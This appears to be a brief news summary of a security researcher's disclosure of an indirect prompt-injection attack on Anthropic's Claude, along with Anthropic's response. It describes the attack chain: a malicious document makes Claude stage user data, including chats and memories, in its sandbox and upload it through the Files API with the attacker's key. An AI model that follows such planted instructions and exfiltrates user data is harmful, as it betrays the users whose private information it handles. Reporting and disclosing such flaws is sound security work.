4 min read
|
Saved February 14, 2026
|
Copied!
Do you care about this?
A security researcher revealed how attackers can exploit Anthropic's Claude AI by using indirect prompt injections to extract user data. By tricking Claude into uploading files to the attacker's account, sensitive information, including chat conversations, can be exfiltrated. The researcher reported this issue, but Anthropic initially dismissed it as a model safety concern.
If you do, here's more
Attackers can exploit Anthropic's Claude AI to steal user data through a technique called indirect prompt injection. Security researcher Johann Rehberger demonstrated how this method can manipulate Claude’s Files APIs. If the AI has network access—enabled by default on some plans—an attacker can use specially crafted prompts to extract sensitive information and upload it to their account using the attacker’s API key. The process allows for the exfiltration of up to 30MB of data at a time, which can include private chat conversations saved by Claude's ‘memories’ feature.
The attack begins when a user opens a malicious document in Claude for analysis. The exploit takes control of the AI, instructing it to save the user's data in a sandbox environment before sending it to the attacker's account through the Anthropic File API. Initially, Anthropic dismissed the report as a model safety issue, but after Rehberger shared details publicly, the company acknowledged that the vulnerability could be reported. Their documentation warns about the risks of network access, outlining potential attack vectors that could lead to data leaks and code execution.
Questions about this article
No questions yet.